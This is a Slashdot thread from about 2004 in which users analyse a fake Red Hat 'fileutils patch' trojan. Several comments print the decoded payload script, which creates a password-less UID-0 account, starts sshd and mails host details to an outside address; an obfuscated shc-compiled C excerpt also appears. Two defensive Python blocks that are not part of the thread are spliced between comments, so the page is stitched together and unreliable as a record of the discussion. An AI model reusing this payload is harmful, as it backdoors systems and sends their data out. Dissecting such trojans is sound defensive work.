      Your points about the MAIL FROM are quite correct. However, the Microsoft reference isn't. Microsoft has attempted to hijack the development of SPF by introducing their SenderID software into SPF and taking credit for the original SPF in the process, and in the process making it proprietary and actually breaking it for people using the old tools. But it turns out that the developers and people writing the RFCs and proposals in Madrid finally gave up trying to integrate Microsoft's weirdness in exhaustion. Microsoft's addition of extremely bad, XML-based, user authentication keys signed by a central office and inserted into the email headers so you have to write a Microsoft patent-using XML parser into your SMTP server has been thrown out due to the encumbrance. SPF where the final "Received:" line gets analyzed for connections that violate the sending policies of the upstream SMTP server, rather than the mail client's SMTP server, can still be done. But it's really a lot better to do it automatically at the SMTP server, as you mention.

  35. Coding 0, Grammar 0. by monoi · · Score: 5, Funny
    Anybody running RedHat and Fedora are strongly adviced to apply this patch!

    But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

    1. Re:Coding 0, Grammar 0. by Mr.Ned · · Score: 1

      The message was also sent to a FreeBSD list. That caused quite a chuckle.

  36. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

  37. Coming soon... by cuteseal · · Score: 1
    *In an ominous voice over*

    "This fall... a malicious trojan / virus / spyware... coming soon to a linux terminal near you..."

  38. mkdir and ls? by mrfibbi · · Score: 1
    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.
    Because we all know how dangerous and root-related those commands can be. For christ's sake. Can't they at least come up with some sort of sudo-related vulnerability that at least sounds plausible?
    1. Re:mkdir and ls? by Anonymous Coward · · Score: 0

      heh, you got lost in the noise man.

      even the dumbest script kid on efnet knows this is impossible below.

      > Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

    2. Re:mkdir and ls? by pclminion · · Score: 1

      Perhaps the intention was to determine what percentage of Fedora users are absolute fucking morons? With no prior evidence, I'd wager quite a few.

  39. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0
  40. Here is the code to inst.c by quantumraptor · · Score: 1

    #if 0
    shc Version 3.7, Generic Script Compiler
    Copyright (c) 1994-2003 Francisco Rosales <frosal@fi.upm.es>

    shc -v -r -T -f redhat
    #endif

    static long date = 0;
    static char mail[] = "Please contact your provider";
    static int relax = 1;
    typedef char pswd_t[433];
    static char pswd[] =
    "\112\326\126\023\345\101\227\242\127\260\241\033\143\344\132\161"
    "\071\320\301\103\056\023\044\053\136\365\273\307\014\033\346\213"
    "\012\176\145\076\305\057\222\140\013\163\022\014\266\152\133\056"
    "\055\055\117\325\077\140\120\025\356\256\310\170\017\153\162\107"
    "\225\266\313\200\345\263\017\174\224\255\001\005\012\151\271\322"
    "\356\260\322\136\126\347\347\026\162\253\362\224\350\150\071\147"
    "\347\202\366\114\104\134\277\102\343\302\275\107\144\271\053\002"
    "\337\045\271\361\045\310\070\327\241\313\227\271\163\003\046\026"
    "\232\241\345\152\151\375\036\365\323\246\050\227\325\140\023\126"
    "\020\363\136\323\032\333\176\021\016\325\274\114\304\144\171\232"
    "\356\176\170\257\340\133\311\172\132\363\307\323\312\221\237\373"
    "\000\204\246\324\174\215\166\237\276\376\044\320\373\345\034\107"
    "\355\013\234\346\316\133\072\157\104\317\250\006\063\232\321\355"
    "\121\202\217\343\207\370\115\072\150\310\231\213\151\155\133\166"
    "\237\207\324\236\014\107\335\271\306\022\022\257\061\133\062\355"
    "\213\173\122\100\272\266\257\332\355\302\117\062\074\063\275\145"
    "\073\056\143\151\031\303\210\151\331\353\262\246\336\143\257\210"
    "\060\321\040\143\142\001\363\261\302\164\052\125\375\160\115\252"
    "\354\264\302\050\360\266\132\047\365\053\101\027\051\052\165\223"
    "\371\316\001\011\027\314\255\273\123\373\356\330\035\074\212\313"
    "\343\225\026\114\201\154\250\212\064\140\023\114\074\226\306\021"
    "\236\244\330\037\001\222\135\211\045\047\357\177\000\045\024\366"
    "\250\215\335\116\171\170\026\335\273\106\037\225\366\104\103\162"
    "\045\032\371\270\031\067\212\016\113\213\355\103\010\063\164\323"
    "\354\115\214\262\241\111\230\102\106\172\327\260\047\301\146\261"
    "\016\241\274\062\024\143\121\117\047\337\141\321\311\000\114\134"
    "\132\053\236\061\232\035\250\154\016\165\060\141\202\212\047\175"
    "\352\366\271\064\335\347\045\356\276\220\027";
    typedef char shll_t[8];
    static char shll[] =
    "\027\227\104\215\344\060\226\051\353\036\220\073\114\040\167\126"
    "\012\043\340\355";
    typedef char inlo_t[3];
    static char inlo[] =
    "\036\173\055\223\266\275\074\222\066\027";
    typedef char xecc_t[15];
    static char xecc[] =
    "\136\317\002\017\371\053\007\345\165\066\036\162\266\047\013\261"
    "\363\204";
    typedef char lsto_t[1];
    static char lsto[] =
    "\347\047\233\033\245\043\257\234\252\240\037\262";
    #define TEXT_chk1 "KTZE4lIVf7i4BR"
    typedef char chk1_t[15];
    static char chk1[] =
    "\176\150\322\244\275\145\026\000\230\311\274\166\150\124\334\163"
    "\053\372\006\215";
    typedef char opts_t[1];
    static char opts[] =
    "\331\051\317\253\133\114\076\242\237\252\144\142";
    typedef char text_t[1199];
    static char text[] =
    "\302\214\330\267\274\114\354\115\323\353\153\135\350\215\100\341"
    "\364\315\074\102\276\122\042\345\157\237\003\103\246\341\370\334"
    "\354\221\33

  41. Christ, they didn't do a very good job... by Nailer · · Score: 5, Insightful
    The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

    • Most users who install security upgrades won't be running Red Hat 7.x.
    • Red Hat is two words. Both begin with capitals.
    • Red Hat use packages. Not hard guys.
    • Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
    • The exclamation marks in 'Apply this patch!' seem a little un vendor-like
    1. Re:Christ, they didn't do a very good job... by frankthechicken · · Score: 5, Funny

      This was version 0.1 of the trojan, and is not yet ready for public release. With helpful contributions like yours, we hope to use the "many eyes" approach, in keeping with the OSS philosophy, to form a complete and fully featured trojan.

      Thus we would like to thank you for your generous time in helping this valuable project reach its full potential.

      You may also like to take note of our web site www.bugzilla-Fedora-Redhat.com, where we have set up a forum dedicated to improving our product.

    2. Re:Christ, they didn't do a very good job... by aldoman · · Score: 2, Insightful

      RE: RedHat 7.3, frankly that's BS. 7.3 and 9 are very heavily used, still.

    3. Re:Christ, they didn't do a very good job... by Nailer · · Score: 1

      That's true, but it doesn't make what I said untrue. Neither Red Hat nor Fedora Legacy provide security updates for 7.3 and 9. Hence people who care about host security tend not to run these releases.

    4. Re:Christ, they didn't do a very good job... by AndroidCat · · Score: 1

      The Microsoft "security updates" aren't very good either, but it's amazing how many I get from boxes where the people said yes.

      --
      One line blog. I hear that they're called Twitters now.
    5. Re:Christ, they didn't do a very good job... by harlows_monkeys · · Score: 3, Informative
      Neither Red Hat nor Fedora Legacy provide security updates for 7.3 and 9

      Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.

    6. Re:Christ, they didn't do a very good job... by WindBourne · · Score: 2, Funny

      What do you mean it is not done??? It has the MS quality control stamp all over it. It is not a bug, it is a feature. :):):)

      --
      I prefer the "u" in honour as it seems to be missing these days.
    7. Re:Christ, they didn't do a very good job... by Puff+Daddy · · Score: 2, Funny

      Don't you mean www.bugzilla-Fedora-RedHat.com?

    8. Re:Christ, they didn't do a very good job... by thegrassyknowl · · Score: 1

      They don't have to fool everyone, just a bunch of select, clueless newbies. There were very complete instructions to build the "patch".

      Us educated users know you don't patch like that (along with all the other warning signs), and would think twice about it.

      Clueless newbies would just follow the link, get the file and enter the commands verbatim, thus getting "patched". There are a lot of people who don't stop to think at all.

      Has anyone looked in the source to see what it actually does?

      --
      I drink to make other people interesting!
    9. Re:Christ, they didn't do a very good job... by Erik+Hollensbe · · Score: 0, Flamebait

      7.3 is widely used. It's because it was the last version of RH that wasn't nearly as chained to the desktop before the Fedora guys came in (who some would say made it worse).

      Most of the people running 7.3 are either doing it because it's too costly to upgrade (money is generally not as much of a problem as time or suggestively, downtime) and a good admin can keep things patched regardless.

      Those that are moving but are keeping RedHat are generally looking at RHEL. 7.3 is no longer supported which is the prime motivator, not any technological benefit.

      God damnit, I hate it when some clueless fart machine spits out something that is patent B.S. and then covers it all under the umbrella of "security". Even the servers with the best service contracts don't rely on that to make their systems "secure". It's common practice to "roll your own" where it's really important.

    10. Re:Christ, they didn't do a very good job... by Nailer · · Score: 1

      I am. Pardon, I thought FL had ended support for 7.3/9 already. They haven't (there was discussion of this on a mailing list recently, and I assumed it had been implemented).

    11. Re:Christ, they didn't do a very good job... by Nailer · · Score: 1, Insightful

      It's common practice to "roll your own" where it's really important.

      It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.

      If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.

    12. Re:Christ, they didn't do a very good job... by mcrbids · · Score: 2, Funny

      What's interesting, is that I actually got this message as a forward from one of my clients, who uses Progeny updates.

      I was in a hurry, I didn't even think about the fact that Redhat is not Progeny, so my response was to simply run "yum update", a quick preview (there was only like two, not very important packages to update) and that was it. All of about 5 minutes, and I did nothing further, since the kernel wasn't updated and no running services were affected.

      I forgot all about it until now, reading this article!

      --
      I have no problem with your religion until you decide it's reason to deprive others of the truth.
    13. Re:Christ, they didn't do a very good job... by david_costanzo · · Score: 3, Funny

      It's more than just a faulty presentation--the whole premise is inane:

      Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

      ls and mkdir are running as a network server with root privileges? How did that happen?

      Besides, we all know RedHat systems configure ls and mkdir to change to low-privilege users (lsnobody and mkdirnobody) after accepting the connection (unless you modify /etc/ls.conf or /etc/mkdir.conf, that is).

    14. Re:Christ, they didn't do a very good job... by Illserve · · Score: 1

      Thanks for the tips, next round be much better!

    15. Re:Christ, they didn't do a very good job... by wheany · · Score: 3, Funny

      Besides, we all know RedHat systems configure ls and mkdir to change to low-privilege users

      We do?

    16. Re:Christ, they didn't do a very good job... by PybusJ · · Score: 1

      What was decided was dropping support for RH7.2 and RH8, to make the task of getting updates for 7.3, RH9 (and now FC1) out quicker.

    17. Re:Christ, they didn't do a very good job... by strider44 · · Score: 1

      Yep. Everyone except YOU!!!

    18. Re:Christ, they didn't do a very good job... by Minwee · · Score: 1
      Red Hat use packages. Not hard guys.

      Which distribution is it that uses "Hard Guys"? Do they have packages too?

    19. Re:Christ, they didn't do a very good job... by schon · · Score: 1

      Yep. Everyone except YOU

      Crap, why'd you tell him? Now, the whole keep-wheany-from-knowing-about-ls-and-mkdir-dropping-privs conspiracy is useless!

      That's it. The next time we do this, you're not invited!

    20. Re:Christ, they didn't do a very good job... by Erik+Hollensbe · · Score: 1

      Yyyeah.

      You don't write a lot of custom patches, do you?

  42. Whois on domains are easily faked by Theatetus · · Score: 2, Informative

    However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com

    Anybody feel like dropping them a line to tell them they're hosting trojaners?

    --
    All's true that is mistrusted
    1. Re:Whois on domains are easily faked by Omega+Hacker · · Score: 1

      Done, not holding my breath.

      --
      GStreamer - The only way to stream!
  43. Yahoo! by pavo · · Score: 2, Informative

    Shut it down! Someone paid you to host this, pass that information along to the authorities.

  44. It's Yahoo hosting by Theatetus · · Score: 1

    Not exactly the box most likely to get pwned by somebody.

    --
    All's true that is mistrusted
  45. Contents of inst.c... by enginuitor · · Score: 5, Informative

    I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
    View inst.c

    1. Re:Contents of inst.c... by nomadic · · Score: 5, Funny

      It's safe to view, as long as you don't go trying to compile and run it! :-p

      Hey, stop trying to deny my GPL rights you Windows-loving tyrant!

    2. Re:Contents of inst.c... by menscher · · Score: 1

      Rather than providing a link to it on your own server, how about providing the original malware link? That way, the curious can enhance the DoS attack, rather than wasting your site's bandwidth.

    3. Re:Contents of inst.c... by secolactico · · Score: 1

      That site is hosted at Yahoo, so a slashdotting is not very likely. Altho the traffic spike might alert the Yahoo admins that something is amiss.

      Am I the only one that thinks this is some sort of prank? I mean, does anybody actually expect a redhat/fedora user to download, compile and install an unknown source, when updates usually come from a yum or up2date repository?

      And hosted on a Yahoo site, with a domain purchased thru Yahoo (check the domain technical contact)?

      --
      No sig
    4. Re:Contents of inst.c... by enginuitor · · Score: 1
      Rather than providing a link to it on your own server, how about providing the original malware link? That way, the curious can enhance the DoS attack, rather than wasting your site's bandwidth.
      The file I posted was the source file itself, rather than the whole package; my original intent was to post the code directly to Slashdot, but I was in a hurry and was having trouble getting past the Lameness Filter, so I uploaded it to my server with a .txt extension, with the intent of making it much easier for those who were interested in it to view it simply by clicking the link, without having to download and unpack it...
    5. Re:Contents of inst.c... by Spoing · · Score: 1
      Am I the only one that thinks this is some sort of prank? I mean, does anybody actually expect a redhat/fedora user to download, compile and install an unknown source, when updates usually come from a yum or up2date repository?

      Yes I'd agree it's probably a prank.

      Yet, I can't agree that nobody will do this.

      I expect that a small group of novices who have some experience with admining a RH or Fedora Linux system will fall for it and never be the wiser. A total novice won't likely fall for it because they are probably used to using either nothing or up2date and will look for patches there. Someone with a little experience will because they are trying to be smart. Experts or ones with a little more experience will smell a rat and will investigate the 'security problem' using the official Fedora site.

      And hosted on a Yahoo site, with a domain purchased thru Yahoo (check the domain technical contact)?

      If the site owner can be found, I'd expect them to deny that they had any knowledge of the incident. I give that a 5% chance of being the truth, though I'd like to know how they intended to use such a site. (Someone mentioned it is hosted on IIS, not any *nix -- Fedora or not.)

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    6. Re:Contents of inst.c... by rts008 · · Score: 1

      Thanks for a superb job well and timely done!

      --
      Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
    7. Re:Contents of inst.c... by Fallen+Andy · · Score: 1

      Smells a wee bit CS undergrad smartass to me...
      Sigh. They never learn.

      I don't feel too worried about this one. Most exploits in UN*x envs are so well known and old chestnuts that your grandfather knew them.

      The bad part with windows is that *only* MS actually could know the weaknesses and they are so full of themselves that they don't admit it to each other let alone the real world. I don't envy anyone trying to fix stuff *inside* MS. How much red tape does the guy partying with NTFS have to fill in to get access to building XX's beloved source...?

      The rise of social engineering attacks is beginning to tick me off though. At least one (almost) bit me when I really did have email from microsoft. Good thing I drink gallons of coffee.

      But, now, I spend at least one hour every day trawling CERT, the internet storm center, Symantec, bla bla bla. Productivity decline is real ugly just to stay on top of it. I wouldn't mind, but starting at 7.30a.m. is kind of tough for an oldie like me.

  46. Good going team "redhat"! by null-sRc · · Score: 1

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

    anyone stupid enough to believe that deserves what they get... mkdir, and ls, yeah ok LOL WTF ROTFL!!!LMAOO

    This is a critical-critical update

    and they say windows has problems with critical vulnerabilities!! look at this! critical-critical! even more critical than just plain critical! phew i feel safer on windows now. never heard of a critical critical on winupdate ;)

    --
    -judging another only defines yourself
    1. Re:Good going team "redhat"! by scottking · · Score: 1

      let's not forget that we are adviced to install it immediately.

      --
      scott king
  47. For what it's worth... by Theatetus · · Score: 1

    To be honest, Microsoft's "trust this software?" dialog is pretty good: hard to fake and lets you view the signing certificate if you want to. The "Always trust software from these people" option kind of bugs me but I guess it's not much different from setting a key's trust level in GPG.

    --
    All's true that is mistrusted
    1. Re:For what it's worth... by awehttam · · Score: 1

      Yeah right, that's why Windows Update uses a signed SSL certificate...

    2. Re:For what it's worth... by irc.goatse.cx+troll · · Score: 1

      Except with the recent rise of Firefox users who are only using it because we told them to (and are still the uneducated masses), someone could script a very convincing IE-like trust this software dialog.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
  48. RE: Redhat trojan. by bejiitas_wrath · · Score: 0, Troll

    I think that this is the inevitable result of the penetration into the general market. Once more unskilled people start using the Linux OS, there will be more things like this going around.

    But with the effort it takes to get something like this running on the typical Linux machine, An experienced user will not be fooled this easily.

    It is only Windblows users who click on every attachment they get in their E-Mails.

    --
    liberare massarum ex ignorantia, clausa descendit molestie.
  49. Re: I'll try it... Execution results! by Student_Tech · · Score: 4, Interesting
    From the top of that inst.c file:

    #if 0
    shc Version 3.7, Generic Script Compiler
    Copyright (c) 1994-2003 Francisco Rosales

    shc -v -r -T -f redhat
    #endif


    From shc's manpage:
    shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.


    Definitely doing something then, at least viewing the parent post.

  50. Re: I'll try it... Execution results! by Smitedogg · · Score: 5, Informative

    Here is what it does.

    Dogg

  51. Here's my analysis by andfarm · · Score: 1, Redundant

    What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    In other words, it'll create a root-equivalent user called 'bash' and mail some system info to root@addlebrain.com.

    --

    TANSTAAFI: There Ain't No Such Thing As A Free iPod.
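
A defender's counterpart to the script quoted above, as an added example that is not from the thread or from any Red Hat tool: the two things that script leaves behind on a host are a second UID-0 account and an empty password hash, and both are visible in /etc/passwd and /etc/shadow. The Python below parses constructed excerpts of those files (assumed sample data, hashes included) and reports UID-0 accounts other than root, accounts whose shadow hash field is empty, and UIDs shared by more than one account. On a real system you would feed it the real files, read as root.

```python
# Constructed /etc/passwd and /etc/shadow excerpts (assumed sample data, not taken from any
# real host): 'bash' is the extra UID-0, password-less account the quoted script would create.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$constructed$notarealhash:12710:0:99999:7:::
bin:*:12710:0:99999:7:::
alice:$1$constructed$notarealhash:12710:0:99999:7:::
bash::12710:0:99999:7:::
"""


def parse_colon_file(text):
    """Split a passwd/shadow-style file into lists of fields, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows


def find_uid0_accounts(passwd_text):
    """Names of accounts with UID 0 other than root: each one is a root-equivalent login."""
    names = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def find_passwordless_accounts(shadow_text):
    """Names of accounts whose shadow hash field is empty (what 'passwd -d' leaves behind)."""
    return [f[0] for f in parse_colon_file(shadow_text) if len(f) >= 2 and f[1] == ""]


def find_duplicate_uids(passwd_text):
    """UIDs shared by more than one account, mapped to the account names that share them."""
    by_uid = {}
    for fields in parse_colon_file(passwd_text):
        if len(fields) >= 3:
            by_uid.setdefault(fields[2], []).append(fields[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def audit_accounts(passwd_text, shadow_text):
    """Combine the checks into a sorted list of (account, finding) pairs for triage."""
    findings = []
    for name in find_uid0_accounts(passwd_text):
        findings.append((name, "UID 0 account other than root"))
    for name in find_passwordless_accounts(shadow_text):
        findings.append((name, "empty password hash (login without a password)"))
    return sorted(findings)


if __name__ == "__main__":
    # Replace the constructed samples with open("/etc/passwd").read() etc. on a real host.
    for account, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account}: {finding}")
    print("shared UIDs:", find_duplicate_uids(SAMPLE_PASSWD))
```

Both checks are cheap enough to run from cron and diff against a known-good baseline; the script above also starts sshd, so a listening-port inventory compared with the same baseline is the natural companion check.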

  52. Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

    The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c

    Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.

    Klik looks to be a "KDE-based Live Installer for Knoppix".

    Still looking....

    Red.

    1. Re:Looks to be a Klik client? by Anonymous Coward · · Score: 0

      Well spotted... It's actually the same code, except the shell commands have been changed. Do a diff and you'll see...

    2. Re:Looks to be a Klik client? by Anonymous Coward · · Score: 0

      Is that a trojan too? Why would a legitimate piece of code want to use obfuscation techniques?

    3. Re:Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

      Ok, see superpeach's post above - both klik, and this, use a bit of code that includes shell script in a C program:
      http://www.datsi.fi.upm.es/~frosal/sources/shc.html

      Red.

    4. Re:Looks to be a Klik client? by MbM · · Score: 2, Insightful

      The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why

      It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.

      --
      - MbM
    5. Re:Looks to be a Klik client? by Antique+Geekmeister · · Score: 1

      It is stupid. It's a classic "script kiddie" tool, with little bits of different packages welded together with little or no understanding of how they actually work. This was not written by a devious or skilled hacker, this was written by someone used to succeeding in conning Windows users to send them passwords.

  53. I'm retarded by Cid+Highwind · · Score: 4, Informative

    Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

    --
    0 1 - just my two bits
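
The mis-named file noted above is a reminder that a file's name says nothing about what it is. As an added example (not from the thread and not a tool the page mentions), the Python below identifies a file by its leading bytes using well-known format signatures (RPM lead, ELF, gzip, ustar) and flags a file whose name claims to be a patch when its contents are not a text diff. The sample inputs are constructed, not the trojan's files.

```python
# Well-known format signatures as (offset, magic bytes, description).
SIGNATURES = [
    (0, b"\xed\xab\xee\xdb", "RPM package"),
    (0, b"\x7fELF", "ELF binary"),
    (0, b"\x1f\x8b", "gzip data"),
    (257, b"ustar", "tar archive"),
]


def sniff(data):
    """Classify a byte string by magic number, falling back to script/text/unknown."""
    for offset, magic, description in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return description
    if data.startswith(b"#!"):
        return "script"
    if b"\x00" not in data[:512]:
        return "text"
    return "unknown binary"


def looks_like_patch(data):
    """True if the content opens the way a unified or context diff does."""
    head = data[:512]
    return head.startswith((b"--- ", b"diff ", b"Index: ", b"*** "))


def check_claimed_patch(filename, data):
    """Return (detected kind, mismatch flag) for a file whose name suggests a patch."""
    kind = sniff(data)
    claims_patch = "patch" in filename.lower() or filename.endswith(".diff")
    mismatch = claims_patch and not (kind == "text" and looks_like_patch(data))
    return kind, mismatch


# Constructed samples: an RPM lead magic with padding, a tiny unified diff, a tar header stub.
SAMPLE_RPM = b"\xed\xab\xee\xdb" + bytes(92)
SAMPLE_PATCH = b"--- a/ls.c\n+++ b/ls.c\n@@ -1 +1 @@\n-old line\n+new line\n"
SAMPLE_TAR = bytes(257) + b"ustar\x00" + bytes(250)


if __name__ == "__main__":
    for name, blob in [("fileutils-patch.bin", SAMPLE_RPM),
                       ("fix.patch", SAMPLE_PATCH),
                       ("archive.tar", SAMPLE_TAR)]:
        print(name, check_claimed_patch(name, blob))
```

The same classification is what file(1) does with a much larger table; the point of doing it in code is to make "is this really what it claims to be" a check that runs before anything is unpacked or executed, not after.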
    1. Re:I'm retarded by busonerd · · Score: 5, Informative

      Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

    2. Re:I'm retarded by numist · · Score: 1

      This entire thread (from parent down) should be modded up informative for the play by play of the dissection of the trojan. Good job, guys. Damn good.

    3. Re:I'm retarded by Anonymous Coward · · Score: 0

      Are you kidding me?!

    4. Re:I'm retarded by Anonymous Coward · · Score: 0

      it's a simple rootkit.

      most of us discovered this 5 minutes after looking at it.

  54. Stupidity by enginuitor · · Score: 3, Funny

    The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!

  55. Unauthorized use of RedHat Logo and name by vchoy · · Score: 2, Interesting

    Going to the site, the use of the Redhat logo and Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain is taken down.

    My question is: can these a**holes get away with using the 'fedora' name instead?

    ps. I am not affiliated with RH in any way.
    Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.

    1. Re:Unauthorized use of RedHat Logo and name by ZeroPost · · Score: 1

      I think copyright violations are going to be the least of their worries if they are ever caught.

  56. Interesting Opportunity by Comatose51 · · Score: 1

    I wonder what percentage of RedHat users would fall for it versus the percentage of Windows users who fall for something similar. We expect Linux users to be more cautious but perhaps they're just as human as everyone else. Perhaps they too can be tricked into running a trojan horse but with something more catered to their taste, i.e. a software update versus a nude Russian tennis player.

    --
    EvilCON - Made Famous by /.
  57. Hosted at Yahoo! Business systems?! by didiken · · Score: 1

    What? I did a simple traceroute and see it goes to Yahoo's server, complemented with a Yahoo! NIC domain.

    Yahoo! should shut this site down immediately!

    1. Re:Hosted at Yahoo! Business systems?! by Anonymous Coward · · Score: 0

      They should, but if the normal time it takes them to remove other spammer and phisher sites is any indication, it'll be a while.

      What the world needs is an email filter that identifies the hosting company of any URL that's mentioned in the body of an inbound email, and if it's one of the ones that the user of the filter doesn't care for, then the TCP connection is abandoned, what was received of the mail so far is trashed, and the sending host is left with an orphaned TCP connection to time out.

  58. Re: I'll try it... Execution results! by MbM · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

    --
    - MbM
  59. Re:I'll try it... "-o" option of adduser? by Anonymous Coward · · Score: 0

    Hmm, what does that "-o" option of adduser do? The manpage on my system (fairly recent Debian) doesn't list anything, and the earlier post where it complained about adding more than one user is probably the same thing.

  60. Geez, Bill, how desperate can you be . . . by Anononnyous+Covvard · · Score: 1

    . . . to be able to claim there's a trojan affecting Linux, too :).

  61. Re:I'll try it... "-o" option of adduser? by busonerd · · Score: 1

    "-o Allow create user with duplicate (non-unique) UID." From gentoo manpage for adduser.
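
The two traces the decoded script above leaves on a box, a second UID-0 account (adduser -o permits the duplicate UID) and an emptied password field (passwd -d), can be checked for directly. This is an added example, not code from the thread or from the trojan; the sample passwd and shadow contents are constructed.

```python
# Added example, not code from the Slashdot thread or from the trojan: audit
# /etc/passwd and /etc/shadow for the two traces the decoded script leaves behind,
# a second UID-0 account (what `adduser -g 0 -u 0 -o bash` creates, -o allowing the
# duplicate UID) and an emptied password field (what `passwd -d bash` does).
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    password: str  # 'x' when the hash lives in /etc/shadow, '' when there is none at all
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse /etc/passwd-style text: seven colon-separated fields per line."""
    entries: List[PasswdEntry] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip a damaged line rather than abort the whole audit
        name, password, uid, gid, _gecos, home, shell = fields
        try:
            entries.append(PasswdEntry(name, password, int(uid), int(gid), home, shell))
        except ValueError:
            continue  # non-numeric uid/gid: also damaged, skip
    return entries


def extra_uid0_accounts(entries: Iterable[PasswdEntry]) -> List[str]:
    """Accounts that share UID 0 with root; any name here is a second root login."""
    return sorted(e.name for e in entries if e.uid == 0 and e.name != "root")


def empty_password_accounts(entries: Iterable[PasswdEntry], shadow_text: str) -> List[str]:
    """Accounts that can log in with no password at all.

    An empty second field means no password; '!' or '*' means locked and is fine.
    /etc/shadow is consulted first, falling back to the /etc/passwd field for
    accounts that have no shadow line (or on systems without shadow passwords).
    """
    shadow: Dict[str, str] = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            shadow[fields[0]] = fields[1]
    flagged = []
    for e in entries:
        field = shadow.get(e.name, e.password)
        if field == "":
            flagged.append(e.name)
    return sorted(flagged)


def audit(passwd_text: str, shadow_text: str) -> Dict[str, List[str]]:
    """Run both checks and return the names each one flagged."""
    entries = parse_passwd(passwd_text)
    return {
        "extra_uid0": extra_uid0_accounts(entries),
        "empty_password": empty_password_accounts(entries, shadow_text),
    }


# Constructed sample files: an ordinary box plus the account the script adds.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
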